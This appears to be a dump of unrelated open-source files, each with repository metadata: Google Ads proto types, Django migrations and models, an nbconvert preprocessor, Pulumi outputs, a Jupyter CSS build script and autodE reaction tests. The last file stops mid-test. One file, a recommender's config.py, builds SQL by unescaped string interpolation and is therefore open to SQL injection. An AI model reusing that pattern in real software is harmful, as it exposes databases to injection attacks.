id = "CKV_AWS_42"
supported_resources = ['AWS::EFS::FileSystem']
categories = [CheckCategories.ENCRYPTION]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'Properties/Encrypted'
check = EFSEncryption()
|
3e15ac044d6197cd75f9a2725814f158aa33d753
|
d139ef8d18fcde584b06c1d7d25477d7d31ee59b
|
/google/ads/googleads/v14/services/types/conversion_adjustment_upload_service.py
|
db5abd25719091befd4bef65792ba9f4a361a288
|
[
"Apache-2.0"
] |
permissive
|
googleads/google-ads-python
|
a53993e6be057d3aa61f276b69e97b8b338d1c12
|
146d7070c1ea2140555d49d73c77892430b37314
|
refs/heads/main
| 2023-08-31T01:58:16.738997
| 2023-06-05T08:18:42
| 2023-08-28T19:08:38
| 143,435,091
| 422
| 525
|
Apache-2.0
| 2023-09-12T17:46:52
| 2018-08-03T14:08:04
|
Python
|
UTF-8
|
Python
| false
| false
| 13,736
|
py
|
conversion_adjustment_upload_service.py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import MutableSequence
import proto # type: ignore
from google.ads.googleads.v14.common.types import offline_user_data
from google.ads.googleads.v14.enums.types import conversion_adjustment_type
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v14.services",
marshal="google.ads.googleads.v14",
manifest={
"UploadConversionAdjustmentsRequest",
"UploadConversionAdjustmentsResponse",
"ConversionAdjustment",
"RestatementValue",
"GclidDateTimePair",
"ConversionAdjustmentResult",
},
)
class UploadConversionAdjustmentsRequest(proto.Message):
r"""Request message for
[ConversionAdjustmentUploadService.UploadConversionAdjustments][google.ads.googleads.v14.services.ConversionAdjustmentUploadService.UploadConversionAdjustments].
Attributes:
customer_id (str):
Required. The ID of the customer performing
the upload.
conversion_adjustments (MutableSequence[google.ads.googleads.v14.services.types.ConversionAdjustment]):
Required. The conversion adjustments that are
being uploaded.
partial_failure (bool):
Required. If true, successful operations will
be carried out and invalid operations will
return errors. If false, all operations will be
carried out in one transaction if and only if
they are all valid. This should always be set to
true.
See
https://developers.google.com/google-ads/api/docs/best-practices/partial-failures
for more information about partial failure.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
"""
customer_id: str = proto.Field(
proto.STRING,
number=1,
)
conversion_adjustments: MutableSequence[
"ConversionAdjustment"
] = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ConversionAdjustment",
)
partial_failure: bool = proto.Field(
proto.BOOL,
number=3,
)
validate_only: bool = proto.Field(
proto.BOOL,
number=4,
)
class UploadConversionAdjustmentsResponse(proto.Message):
r"""Response message for
[ConversionAdjustmentUploadService.UploadConversionAdjustments][google.ads.googleads.v14.services.ConversionAdjustmentUploadService.UploadConversionAdjustments].
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to conversion adjustment
failures in the partial failure mode. Returned
when all errors occur inside the adjustments. If
any errors occur outside the adjustments (for
example, auth errors), we return an RPC level
error. See
https://developers.google.com/google-ads/api/docs/best-practices/partial-failures
for more information about partial failure.
results (MutableSequence[google.ads.googleads.v14.services.types.ConversionAdjustmentResult]):
Returned for successfully processed conversion adjustments.
Proto will be empty for rows that received an error. Results
are not returned when validate_only is true.
job_id (int):
Job ID for the upload batch.
"""
partial_failure_error: status_pb2.Status = proto.Field(
proto.MESSAGE,
number=1,
message=status_pb2.Status,
)
results: MutableSequence[
"ConversionAdjustmentResult"
] = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ConversionAdjustmentResult",
)
job_id: int = proto.Field(
proto.INT64,
number=3,
)
class ConversionAdjustment(proto.Message):
r"""A conversion adjustment.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
gclid_date_time_pair (google.ads.googleads.v14.services.types.GclidDateTimePair):
For adjustments, uniquely identifies a conversion that was
reported without an order ID specified. If the
adjustment_type is ENHANCEMENT, this value is optional but
may be set in addition to the order_id.
order_id (str):
The order ID of the conversion to be
adjusted. If the conversion was reported with an
order ID specified, that order ID must be used
as the identifier here. The order ID is required
for enhancements.
This field is a member of `oneof`_ ``_order_id``.
conversion_action (str):
Resource name of the conversion action
associated with this conversion adjustment.
Note: Although this resource name consists of a
customer id and a conversion action id,
validation will ignore the customer id and use
the conversion action id as the sole identifier
of the conversion action.
This field is a member of `oneof`_ ``_conversion_action``.
adjustment_date_time (str):
The date time at which the adjustment occurred. Must be
after the conversion_date_time. The timezone must be
specified. The format is "yyyy-mm-dd hh:mm:ss+|-hh:mm", for
example, "2019-01-01 12:32:45-08:00".
This field is a member of `oneof`_ ``_adjustment_date_time``.
adjustment_type (google.ads.googleads.v14.enums.types.ConversionAdjustmentTypeEnum.ConversionAdjustmentType):
The adjustment type.
restatement_value (google.ads.googleads.v14.services.types.RestatementValue):
Information needed to restate the
conversion's value. Required for restatements.
Should not be supplied for retractions. An error
will be returned if provided for a retraction.
NOTE: If you want to upload a second restatement
with a different adjusted value, it must have a
new, more recent, adjustment occurrence time.
Otherwise, it will be treated as a duplicate of
the previous restatement and ignored.
user_identifiers (MutableSequence[google.ads.googleads.v14.common.types.UserIdentifier]):
The user identifiers to enhance the original
conversion. ConversionAdjustmentUploadService
only accepts user identifiers in enhancements.
The maximum number of user identifiers for each
enhancement is 5.
user_agent (str):
The user agent to enhance the original conversion. This can
be found in your user's HTTP request header when they
convert on your web page. Example, "Mozilla/5.0 (iPhone; CPU
iPhone OS 12_2 like Mac OS X)". User agent can only be
specified in enhancements with user identifiers. This should
match the user agent of the request that sent the original
conversion so the conversion and its enhancement are either
both attributed as same-device or both attributed as
cross-device.
This field is a member of `oneof`_ ``_user_agent``.
"""
gclid_date_time_pair: "GclidDateTimePair" = proto.Field(
proto.MESSAGE,
number=12,
message="GclidDateTimePair",
)
order_id: str = proto.Field(
proto.STRING,
number=13,
optional=True,
)
conversion_action: str = proto.Field(
proto.STRING,
number=8,
optional=True,
)
adjustment_date_time: str = proto.Field(
proto.STRING,
number=9,
optional=True,
)
adjustment_type: conversion_adjustment_type.ConversionAdjustmentTypeEnum.ConversionAdjustmentType = proto.Field(
proto.ENUM,
number=5,
enum=conversion_adjustment_type.ConversionAdjustmentTypeEnum.ConversionAdjustmentType,
)
restatement_value: "RestatementValue" = proto.Field(
proto.MESSAGE,
number=6,
message="RestatementValue",
)
user_identifiers: MutableSequence[
offline_user_data.UserIdentifier
] = proto.RepeatedField(
proto.MESSAGE,
number=10,
message=offline_user_data.UserIdentifier,
)
user_agent: str = proto.Field(
proto.STRING,
number=11,
optional=True,
)
class RestatementValue(proto.Message):
r"""Contains information needed to restate a conversion's value.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
adjusted_value (float):
The restated conversion value. This is the
value of the conversion after restatement. For
example, to change the value of a conversion
from 100 to 70, an adjusted value of 70 should
be reported. NOTE: If you want to upload a
second restatement with a different adjusted
value, it must have a new, more recent,
adjustment occurrence time. Otherwise, it will
be treated as a duplicate of the previous
restatement and ignored.
This field is a member of `oneof`_ ``_adjusted_value``.
currency_code (str):
The currency of the restated value. If not
provided, then the default currency from the
conversion action is used, and if that is not
set then the account currency is used. This is
the ISO 4217 3-character currency code for
example, USD or EUR.
This field is a member of `oneof`_ ``_currency_code``.
"""
adjusted_value: float = proto.Field(
proto.DOUBLE,
number=3,
optional=True,
)
currency_code: str = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class GclidDateTimePair(proto.Message):
r"""Uniquely identifies a conversion that was reported without an
order ID specified.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
gclid (str):
Google click ID (gclid) associated with the
original conversion for this adjustment.
This field is a member of `oneof`_ ``_gclid``.
conversion_date_time (str):
The date time at which the original conversion for this
adjustment occurred. The timezone must be specified. The
format is "yyyy-mm-dd hh:mm:ss+|-hh:mm", for example,
"2019-01-01 12:32:45-08:00".
This field is a member of `oneof`_ ``_conversion_date_time``.
"""
gclid: str = proto.Field(
proto.STRING,
number=3,
optional=True,
)
conversion_date_time: str = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class ConversionAdjustmentResult(proto.Message):
r"""Information identifying a successfully processed
ConversionAdjustment.
.. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields
Attributes:
gclid_date_time_pair (google.ads.googleads.v14.services.types.GclidDateTimePair):
The gclid and conversion date time of the
conversion.
order_id (str):
The order ID of the conversion to be
adjusted.
conversion_action (str):
Resource name of the conversion action
associated with this conversion adjustment.
This field is a member of `oneof`_ ``_conversion_action``.
adjustment_date_time (str):
The date time at which the adjustment occurred. The format
is "yyyy-mm-dd hh:mm:ss+|-hh:mm", for example, "2019-01-01
12:32:45-08:00".
This field is a member of `oneof`_ ``_adjustment_date_time``.
adjustment_type (google.ads.googleads.v14.enums.types.ConversionAdjustmentTypeEnum.ConversionAdjustmentType):
The adjustment type.
"""
gclid_date_time_pair: "GclidDateTimePair" = proto.Field(
proto.MESSAGE,
number=9,
message="GclidDateTimePair",
)
order_id: str = proto.Field(
proto.STRING,
number=10,
)
conversion_action: str = proto.Field(
proto.STRING,
number=7,
optional=True,
)
adjustment_date_time: str = proto.Field(
proto.STRING,
number=8,
optional=True,
)
adjustment_type: conversion_adjustment_type.ConversionAdjustmentTypeEnum.ConversionAdjustmentType = proto.Field(
proto.ENUM,
number=5,
enum=conversion_adjustment_type.ConversionAdjustmentTypeEnum.ConversionAdjustmentType,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
d4f214b39f66c22358748a1b8d4bd2e1cef374b4
|
1ec0cf2205deb58b97495e1b5d0a8df3b1f3faf1
|
/concordia/migrations/0029_assettranscriptionreservation_reservation_token.py
|
fb07816a60e3ae051559ac91f45ff6e9bdad40c1
|
[
"LicenseRef-scancode-public-domain",
"CC0-1.0"
] |
permissive
|
LibraryOfCongress/concordia
|
f9d937223320bb6b9185f764485d14d22c06f4cd
|
2f345cd177c3ae0ec3913e39c21332f5a35f634b
|
refs/heads/main
| 2023-08-22T05:28:58.717760
| 2023-08-21T18:46:22
| 2023-08-21T18:46:22
| 134,269,274
| 152
| 36
|
NOASSERTION
| 2023-09-14T18:50:49
| 2018-05-21T12:56:57
|
Python
|
UTF-8
|
Python
| false
| false
| 414
|
py
|
0029_assettranscriptionreservation_reservation_token.py
|
# Generated by Django 2.2 on 2019-04-23 15:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("concordia", "0028_asset_year")]
operations = [
migrations.AddField(
model_name="assettranscriptionreservation",
name="reservation_token",
field=models.CharField(max_length=50, default="migration"),
)
]
|
34979c7ef3b9396bec49a869ebbe88a19836d58e
|
160f08e768d7271f9522ad2597ac4ee79c04477a
|
/src/c3nav/mapdata/migrations/0002_locationredirect.py
|
781669d3ec03da5059a127966dc9cd94513505ce
|
[
"Apache-2.0"
] |
permissive
|
c3nav/c3nav
|
6254724dfc8589ee03c6028577befd7c65b05857
|
1a4ef5caa06ddacc8d9370b5adcee248fd4f55f7
|
refs/heads/main
| 2023-08-04T08:36:18.431458
| 2023-07-24T09:57:18
| 2023-07-24T09:57:18
| 56,852,994
| 140
| 47
|
Apache-2.0
| 2023-07-05T22:55:27
| 2016-04-22T12:13:51
|
Python
|
UTF-8
|
Python
| false
| false
| 982
|
py
|
0002_locationredirect.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-11 19:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0001_squashed_refactor_2017'),
]
operations = [
migrations.CreateModel(
name='LocationRedirect',
fields=[
('locationslug_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='redirect', serialize=False, to='mapdata.LocationSlug')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='redirects', to='mapdata.LocationSlug', verbose_name='target')),
],
options={
'default_related_name': 'redirect',
},
bases=('mapdata.locationslug',),
),
]
|
f56e44b229b38159d3c5a5eb236474579855ff2b
|
6793f3b093478fdde550d8669b9b955081af5e0e
|
/nbconvert/preprocessors/latex.py
|
312fd13a39eab09104f2deb6f2a2e9fe5c9bfc09
|
[
"BSD-3-Clause"
] |
permissive
|
jupyter/nbconvert
|
0afe110c4ec39b68661c601f8f3b20fd21a9ba13
|
51c6e0a7d40918366e2a68c5ea471fd2c65722cb
|
refs/heads/main
| 2023-09-03T16:05:25.981152
| 2023-08-29T13:57:58
| 2023-08-29T13:57:58
| 33,653,617
| 1,645
| 654
|
BSD-3-Clause
| 2023-09-11T10:42:26
| 2015-04-09T06:58:23
|
Python
|
UTF-8
|
Python
| false
| false
| 2,736
|
py
|
latex.py
|
"""Module that allows latex output notebooks to be conditioned before
they are converted.
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2013, the IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
from traitlets import List, Unicode
from .base import Preprocessor
# -----------------------------------------------------------------------------
# Classes
# -----------------------------------------------------------------------------
class LatexPreprocessor(Preprocessor):
"""Preprocessor for latex destined documents.
Populates the ``latex`` key in the resources dict,
adding definitions for pygments highlight styles.
Sets the authors, date and title of the latex document,
overriding the values given in the metadata.
"""
date = Unicode(
None,
help=("Date of the LaTeX document"),
allow_none=True,
).tag(config=True)
title = Unicode(None, help=("Title of the LaTeX document"), allow_none=True).tag(config=True)
author_names = List(
Unicode(),
default_value=None,
help=("Author names to list in the LaTeX document"),
allow_none=True,
).tag(config=True)
style = Unicode("default", help="Name of the pygments style to use").tag(config=True)
def preprocess(self, nb, resources):
"""Preprocessing to apply on each notebook.
Parameters
----------
nb : NotebookNode
Notebook being converted
resources : dictionary
Additional resources used in the conversion process. Allows
preprocessors to pass variables into the Jinja engine.
"""
# Generate Pygments definitions for Latex
from pygments.formatters import LatexFormatter
resources.setdefault("latex", {})
resources["latex"].setdefault(
"pygments_definitions", LatexFormatter(style=self.style).get_style_defs()
)
resources["latex"].setdefault("pygments_style_name", self.style)
if self.author_names is not None:
nb.metadata["authors"] = [{"name": author} for author in self.author_names]
if self.date is not None:
nb.metadata["date"] = self.date
if self.title is not None:
nb.metadata["title"] = self.title
return nb, resources
|
3395edb0e2779c4dc49e684491cd85f4549c3c91
|
3752a799d650bdd36206045f13ff6bc4d5829e17
|
/common/config.py
|
294e6e27ccb279c7882ee96ed9f353d445adf23e
|
[
"MIT"
] |
permissive
|
GavinHacker/recsys_core
|
b034b41628e8eeb40c2bd32976d62d44e8430e08
|
51953d92d86799b60694a1be6dfe6fd178101570
|
refs/heads/master
| 2021-12-31T01:29:03.636089
| 2021-12-30T08:53:29
| 2021-12-30T08:53:29
| 168,310,743
| 326
| 87
|
MIT
| 2019-09-10T00:48:44
| 2019-01-30T08:55:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
config.py
|
# -*- coding: utf-8 -*-
import pandas as pd
import pymysql
import pymysql.cursors
from functools import reduce
import numpy as np
import pandas as pd
import uuid
import datetime
from sklearn.feature_extraction import DictVectorizer
from sklearn.metrics.pairwise import pairwise_distances
import json
# 获取数据库中,config表的配置项, type为配置项的key, 比如获取csv_last_url,则值为/usr/local/recsys_core/data/comment_origin_data_2019-01-01-01-01-01.csv
def get_config_property(type_, conn):
sql = 'select * from config where type = \'%s\'' % type_
try:
with conn.cursor() as cur:
cur.execute(sql)
r = cur.fetchone()
if r is not None:
return r[2]
return None
except Exception as e:
print(e)
conn.close()
# 与get_config_property对应, 为设置配置项函数
def set_config_property(content, type_, conn):
sql = 'update config set content = \'%s\' where type = \'%s\'' % (content, type_)
try:
with conn.cursor() as cur:
cur.execute(sql)
conn.commit()
except Exception as e:
print(e)
conn.close()
# 测试
if __name__ == '__main__':
print(get_config_property('csv_last_url'))
|
310838bb36209cbd4bb8038cfafe3bb2deb959db
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/inspections/PyListCreationInspection/test.py
|
3aa31a86316b4895b235c3927a6b351c4822f4ee
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
test.py
|
<weak_warning descr="Multi-step list initialization can be replaced with a list literal">my_list = [m]</weak_warning>
my_list.append(1)
my_list.append(var)
do_something()
my_list_1 = [m]
my_list_1.append(my_list_1)
|
6884c2f66d54c6dde37325dc61e15d11a55acc9e
|
b2d49f04f220d46a7572bf424b6c02c7466786e8
|
/contrib/get_nbconvert_minfied_css.py
|
69ed855218b44a98b802806acc04969a1646c40d
|
[
"MIT"
] |
permissive
|
inducer/relate
|
19a7b83e07de63216918d71e875eca53ee8ceb0c
|
7c28f65ef99a6f05007c518763762aca4504145b
|
refs/heads/main
| 2023-08-29T10:32:43.952986
| 2023-08-28T15:17:16
| 2023-08-28T18:40:16
| 20,311,659
| 352
| 138
| null | 2023-09-09T00:20:05
| 2014-05-29T23:39:42
|
Python
|
UTF-8
|
Python
| false
| false
| 6,618
|
py
|
get_nbconvert_minfied_css.py
|
# -*- coding: utf-8 -*-
#! /usr/bin/env python3
"""
Generate minified stylesheet for ipython notebook
"""
import os
REPLACE_HIGHLIGHT_WITH_CODEHILITE = False
NOTEBOOK_CSS_VERSION = '5.4.0'
CSS_URL = ("https://cdn.jupyter.org/notebook/%s/style/style.min.css"
% NOTEBOOK_CSS_VERSION)
REQUEST_TIMEOUT = 6
REQUEST_MAX_RETRIES = 5
IPYTHON_NOTEBOOK_DECLARE_STR = """
/*!
*
* IPython notebook
*
*/"""
IPYTHON_NOTEBOOK_WEBAPP_DECLARE_STR = """
/*!
*
* IPython notebook webapp
*
*/
"""
HIGHLIGHT_CSS_CLASS = ".highlight"
CODEHILITE_CSS_CLASS = ".codehilite"
PYGMENTS_STYLE = "default"
HIGHLIGT_DECLARE_STR = """
/*!
*
* Pygments "%s" style with "%s" css_class
*
*/
""" % (PYGMENTS_STYLE,
CODEHILITE_CSS_CLASS
if REPLACE_HIGHLIGHT_WITH_CODEHILITE else HIGHLIGHT_CSS_CLASS)
DEST_DIR = (
os.path.abspath(
os.path.join(
os.path.dirname(__file__),
os.path.pardir, 'relate', 'static', 'css')))
CSS_DEST = os.path.join(DEST_DIR, 'ipynb.style.css')
CSS_MINIFIED_DEST = os.path.join(DEST_DIR, 'ipynb.style.min.css')
def retry_urlopen(request, timeout=REQUEST_TIMEOUT, n_retries=REQUEST_MAX_RETRIES):
from urllib.request import urlopen
i = 0
while True:
try:
result = urlopen(request, timeout=timeout).read()
return result
except Exception as e:
from urllib.error import URLError
from socket import timeout as TimeoutError # noqa: N812
if not isinstance(e, (URLError, TimeoutError)):
raise e
if "timed out" not in str(e).lower():
raise e
i += 1
if i > n_retries:
raise e
print("\rRequest timed out, retry (%s/%s). " % (
i, n_retries), flush=True, end="")
import time
time.sleep(0.1)
def minify_css(css_string):
url = 'https://cssminifier.com/raw'
post_fields = {'input': css_string}
from urllib.parse import urlencode
from urllib.request import Request
request = Request(url, urlencode(post_fields).encode())
return retry_urlopen(request)
class GenerateCSS(object):
def _download(self):
try:
return retry_urlopen(CSS_URL)
except Exception as e:
if 'ssl' in str(e).lower():
import sys
try:
import pycurl # noqa: F401
except ImportError:
print(
"Failed, try again after installing PycURL with "
"`pip install pycurl` to avoid outdated SSL.",
file=sys.stderr)
raise e
else:
print("Failed, trying again with PycURL to avoid "
"outdated SSL.",
file=sys.stderr)
return self._download_pycurl()
raise e
def _download_pycurl(self):
"""Download CSS with pycurl, in case of old SSL (e.g. Python < 2.7.9)."""
import pycurl
c = pycurl.Curl()
c.setopt(c.URL, CSS_URL)
from io import BytesIO
buf = BytesIO()
c.setopt(c.WRITEDATA, buf)
c.perform()
return buf.getvalue().decode()
def process_nbconvert_css(self):
print("Downloading ipython notebook CSS: %s." % CSS_URL)
try:
css = self._download()
print("Done.")
return self._process_nbconvert_css(css)
except Exception:
raise
def _process_nbconvert_css(self, css):
print("Processing downloaded ipython notebook CSS.")
try:
css = css.split(IPYTHON_NOTEBOOK_DECLARE_STR.encode())[1]
css = IPYTHON_NOTEBOOK_DECLARE_STR.encode() + css
except IndexError:
raise ValueError("Bad splitter for notebook css %s"
% IPYTHON_NOTEBOOK_DECLARE_STR)
print("Done.")
if REPLACE_HIGHLIGHT_WITH_CODEHILITE:
css = css.replace(HIGHLIGHT_CSS_CLASS.encode() + b" ",
CODEHILITE_CSS_CLASS.encode() + b" ")
import tinycss2
css_parsed, encoding = tinycss2.parse_stylesheet_bytes(css)
for n in css_parsed:
if isinstance(n, tinycss2.ast.QualifiedRule):
n.prelude[0:0] = [
tinycss2.ast.LiteralToken(None, None, "."),
tinycss2.ast.IdentToken(
None, None, "relate-notebook-container"),
tinycss2.ast.WhitespaceToken(None, None, " "),
]
result = tinycss2.serialize(css_parsed).encode(encoding.name)
return result
def process_highlight_style_defs(self, style=PYGMENTS_STYLE):
print("Processing Pygments code highlight CSS.")
def get_highlight_style_defs():
from pygments.formatters import get_formatter_by_name
formatter = get_formatter_by_name("html", style=style)
return formatter.get_style_defs()
style_defs = get_highlight_style_defs()
print("Done.")
if REPLACE_HIGHLIGHT_WITH_CODEHILITE:
css_class = CODEHILITE_CSS_CLASS
else:
css_class = HIGHLIGHT_CSS_CLASS
return (HIGHLIGT_DECLARE_STR
+ "\n".join(["%s %s" % (css_class, line)
for line in style_defs.splitlines()]))
def get_assembled_css(self):
try:
nbcovert_css = self.process_nbconvert_css()
highlight_css = self.process_highlight_style_defs()
except Exception:
raise
css = "\n".join([nbcovert_css.decode(), highlight_css])
print("CSS assembled.")
return css
def get_minified_css(self, css):
css = (css.replace(IPYTHON_NOTEBOOK_DECLARE_STR, "")
.replace(IPYTHON_NOTEBOOK_WEBAPP_DECLARE_STR, "")
.replace(HIGHLIGT_DECLARE_STR, "")
)
return minify_css(css)
def run(self):
css = self.get_assembled_css()
with open(CSS_DEST, 'wb') as f:
f.write(css.encode())
print("Succesfully generated %s" % CSS_DEST)
print("Minifying CSS...")
minified_css = self.get_minified_css(css).decode()
print("Done.")
with open(CSS_MINIFIED_DEST, 'wb') as f:
f.write(minified_css.encode())
print("Succesfully generated %s" % CSS_MINIFIED_DEST)
def main():
g = GenerateCSS()
g.run()
if __name__ == "__main__":
main()
|
e7b949063e47be1b4ace1ed4137859b0f68b7ad9
|
93df6fb9e518d7e6486b166665a5b21172fecfba
|
/backend/users/models.py
|
daf4b8a3582f01d2a0c44592c3e1ac24a662c1b4
|
[
"MIT"
] |
permissive
|
vintasoftware/django-react-boilerplate
|
91e01d06cad611e9feb9a796e52d82c0e7bac387
|
55ef9677554ba4d8b5ab0b71a3461a24e0a1fb3a
|
refs/heads/master
| 2023-09-05T10:34:15.305739
| 2023-08-14T22:41:21
| 2023-08-14T22:41:21
| 63,726,409
| 1,815
| 568
|
MIT
| 2023-09-14T18:28:07
| 2016-07-19T20:37:29
|
Python
|
UTF-8
|
Python
| false
| false
| 967
|
py
|
models.py
|
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
from django.db import models
from django.utils.translation import ugettext_lazy as _
from common.models import IndexedTimeStampedModel
from .managers import UserManager
class User(AbstractBaseUser, PermissionsMixin, IndexedTimeStampedModel):
email = models.EmailField(max_length=255, unique=True)
is_staff = models.BooleanField(
default=False, help_text=_("Designates whether the user can log into this admin site.")
)
is_active = models.BooleanField(
default=True,
help_text=_(
"Designates whether this user should be treated as "
"active. Unselect this instead of deleting accounts."
),
)
objects = UserManager()
USERNAME_FIELD = "email"
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def __str__(self):
return self.email
|
efc5bda4b42b3709285db8840ca9015161be68b8
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/domainregistration/v20210201/outputs.py
|
fab80971d71acda491f297d4528a05c982163be8
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 2,448
|
py
|
outputs.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'NameIdentifierResponse',
'TldLegalAgreementResponse',
]
@pulumi.output_type
class NameIdentifierResponse(dict):
"""
Identifies an object.
"""
def __init__(__self__, *,
name: Optional[str] = None):
"""
Identifies an object.
:param str name: Name of the object.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the object.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class TldLegalAgreementResponse(dict):
"""
Legal agreement for a top level domain.
"""
def __init__(__self__, *,
agreement_key: str,
content: str,
title: str,
url: Optional[str] = None):
"""
Legal agreement for a top level domain.
:param str agreement_key: Unique identifier for the agreement.
:param str content: Agreement details.
:param str title: Agreement title.
:param str url: URL where a copy of the agreement details is hosted.
"""
pulumi.set(__self__, "agreement_key", agreement_key)
pulumi.set(__self__, "content", content)
pulumi.set(__self__, "title", title)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="agreementKey")
def agreement_key(self) -> str:
"""
Unique identifier for the agreement.
"""
return pulumi.get(self, "agreement_key")
@property
@pulumi.getter
def content(self) -> str:
"""
Agreement details.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter
def title(self) -> str:
"""
Agreement title.
"""
return pulumi.get(self, "title")
@property
@pulumi.getter
def url(self) -> Optional[str]:
"""
URL where a copy of the agreement details is hosted.
"""
return pulumi.get(self, "url")
|
c487a55f4cd98ff9488173b950d8f3e8f5e38dc2
|
4daab5ba90185bae65169ebb8183c635385ab3f8
|
/tests/test_sn2prime.py
|
b1b1b92eccad551e159242e869f7eba5d44a6c60
|
[
"MIT"
] |
permissive
|
duartegroup/autodE
|
bcf69440bd04411f97d39df0df0ae1f2bf6feb8c
|
4d6667592f083dfcf38de6b75c4222c0a0e7b60b
|
refs/heads/master
| 2023-09-01T15:08:16.028378
| 2023-07-25T08:09:05
| 2023-07-25T08:09:05
| 196,085,570
| 132
| 42
|
MIT
| 2023-09-12T15:20:54
| 2019-07-09T21:20:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,725
|
py
|
test_sn2prime.py
|
"""
Test that an SN2' substitution reaction is correctly generated
"""
from autode.reactions import Reaction
from autode.species import ReactantComplex
from autode.atoms import Atom
from autode.reactions.reaction_types import Substitution
from autode.species import Reactant, Product
from autode.bond_rearrangement import get_bond_rearrangs
from autode.bond_rearrangement import BondRearrangement
from autode.substitution import get_substc_and_add_dummy_atoms
from autode.input_output import xyz_file_to_atoms
from autode.transition_states.locate_tss import translate_rotate_reactant
from . import testutils
import os
here = os.path.dirname(os.path.abspath(__file__))
def test_detection():
# F- + H2CCHCH2Cl -> FCH2CHCH2 + Cl-
reaction = Reaction(
Reactant(name="F-", charge=-1, atoms=[Atom("F")]),
Reactant(name="alkeneCl", smiles="C=CCCl"),
Product(name="alkeneF", smiles="C=CCF"),
Product(name="Cl-", charge=-1, atoms=[Atom("Cl")]),
)
assert reaction.type == Substitution
reactant, product = reaction.reactant, reaction.product
bond_rearrs = get_bond_rearrangs(reactant, product, name="SN2")
# autodE should find both direct SN2 and SN2' pathways
assert len(bond_rearrs) == 2
os.remove("SN2_BRs.txt")
@testutils.work_in_zipped_dir(os.path.join(here, "data", "sn2prime.zip"))
def test_subst():
reactant = Reactant(name="sn2_r", atoms=xyz_file_to_atoms("reactant.xyz"))
# SN2' bond rearrangement
bond_rearr = BondRearrangement(
forming_bonds=[(0, 1)], breaking_bonds=[(3, 4)]
)
subst_centers = get_substc_and_add_dummy_atoms(
reactant, bond_rearr, shift_factor=1.0
)
assert len(subst_centers) == 1
# get_substitution_centres should add a dummy atom so the ACX angle is
# defined
assert len(reactant.atoms) == 11
@testutils.work_in_zipped_dir(os.path.join(here, "data", "sn2prime.zip"))
def test_translate_rotate():
reactant = ReactantComplex(
Reactant(name="F-", charge=-1, atoms=[Atom("F")]),
Reactant(name="alkeneCl", atoms=xyz_file_to_atoms("alkene.xyz")),
)
assert reactant.n_molecules == 2
# Initially the geometry is not sensible
assert reactant.distance(0, 2) < 1.0
# SN2' bond rearrangement
bond_rearr = BondRearrangement(
